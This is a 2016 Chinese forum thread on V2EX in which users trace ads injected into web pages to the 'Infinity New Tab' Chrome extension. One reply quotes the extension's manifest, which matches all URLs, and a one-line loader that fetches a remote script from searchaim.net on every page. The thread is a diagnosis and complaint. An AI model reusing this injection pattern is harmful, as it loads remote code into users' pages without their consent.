V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
fourstring
V2EX  ›  站长

网站被插入 searchaim.net 的迷之 js,疑似广告?

  •  
  •   fourstring · 2016-02-16 15:17:12 +08:00 · 3734 次点击
    这是一个创建于 3238 天前的主题,其中的信息可能已经有所发展或是发生改变。

    如题。用 Ghost 搭建的网站,没有登录, chrome 发现 cookie 有 1 个。
    打开看看,来自一个域名 searchaim.net 。但是我印象中貌似从未见过这个网站,页面上应该也没有引用这个 js 。
    如下图:
    QQ20160216-1.png
    这是被插的 js :
    QQ20160216-2.png
    QQ20160216-3.png
    网站已启用 HTTPS ,重定向所有 HTTP ,启用 HSTS , ssllabs A+
    坐标湘潭,运营商电信。系统是 OS X 10.11.3

    刚刚在 Ubuntu 虚拟机上测试了,没有被加这个 JS ,但是 OS X 下有

    求教……

    第 1 条附言  ·  2016-02-16 15:51:23 +08:00

    已解决,发现是Infinity 新标签页这个扩展以所谓的开发需要支持为由肆意插入广告。
    该扩展已被我删除并举报。

    8 条回复    2016-02-17 13:42:20 +08:00
    chemzqm
        1
    chemzqm  
       2016-02-16 15:35:23 +08:00
    你先在远程机器上 curl 下那个页面,排除被劫持的可能。
    不过很可能是你用的某个主题的 js 加的,话说 ghost 的 makrdown 功能特别弱,大部分 gfm 扩展都没有,改起来比 wordpress 还要麻烦,因为要重启服务。
    fourstring
        2
    fourstring  
    OP
       2016-02-16 15:41:54 +08:00
    @chemzqm 感谢回复。
    由于 ubuntu 虚拟机下没有被插广告,我就在 OS X 上开了隐身,也没有广告,证实是扩展引起的。
    然后我在 HTML 里找到了一个 iframe ,默认 display : none ,删除后发现这是一个开发者的话,说什么插件正在开发,需要我们的广告支持。
    我一个个把扩展关掉再打开,发现插广告的是“ Infinity 新标签页”这个插件……
    个人对这种行为特别反感,即使插件开发需要支持,也没有权力在用户浏览页面上肆意插入广告,这和流氓无异。

    Ghost 的 markdown 的确不怎么地,不过它还支持 gfm 的代码,算是个可以庆幸的事了……
    hxsf
        3
    hxsf  
       2016-02-16 19:22:20 +08:00
    刚刚我也发现了,居然有人跟我一样。。。。

    我是自己在写东西,调试的时候忽然发现 dom 里多了一堆 script 。。。

    已经证实是由 Infinity New Tab 2.5.6.0 版加入 之前版本( 2.5.5.0 )没有
    通过 chrome 扩展的接口在所有页面插入 myscript.js
    ```
    "content_scripts": [ {
    "js": [ "js/myscript.js" ],
    "matches": [ "*://*/*" ]
    } ],
    ```
    内容为
    ```js
    var script=document.createElement("script");script.async=!0,script.src="//searchaim.net/ca93d58f43.js",document.getElementsByTagName("body")[0].appendChild(script);
    ```
    剩下的其它 script 和 iframe 都通过 ca93d58f43.js 插进来的


    这种被插入 js ,我都直接去~/Library/Application\ Support/Google/Chrome/Default/Extensions 里搜,一搜一个准。。。

    最后,同举报
    hxsf
        4
    hxsf  
       2016-02-16 19:37:18 +08:00
    14 年见过这个玩意的作者发帖说自己做的无广告

    然而现在。。。只能呵呵了。。。
    fourstring
        5
    fourstring  
    OP
       2016-02-16 20:57:14 +08:00
    @hxsf 在今天事件爆发之后,作者迅速又更新了 2.5.7 ,刚刚我下下来看了,已经把广告给去了
    然并卵,这种态度,无论如何也不会再用
    hxsf
        6
    hxsf  
       2016-02-16 21:09:33 +08:00
    @fourstring 是的
    stackboom
        7
    stackboom  
       2016-02-17 13:26:49 +08:00
    发现 @yangguang31466 在 v2 上发过贴,不知道是不是原作者。 Infinity 云备份挺好用的。。哎~
    fourstring
        8
    fourstring  
    OP
       2016-02-17 13:42:20 +08:00
    @stackboom 这个人貌似是作者
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1930 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 00:55 · PVG 08:55 · LAX 16:55 · JFK 19:55
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.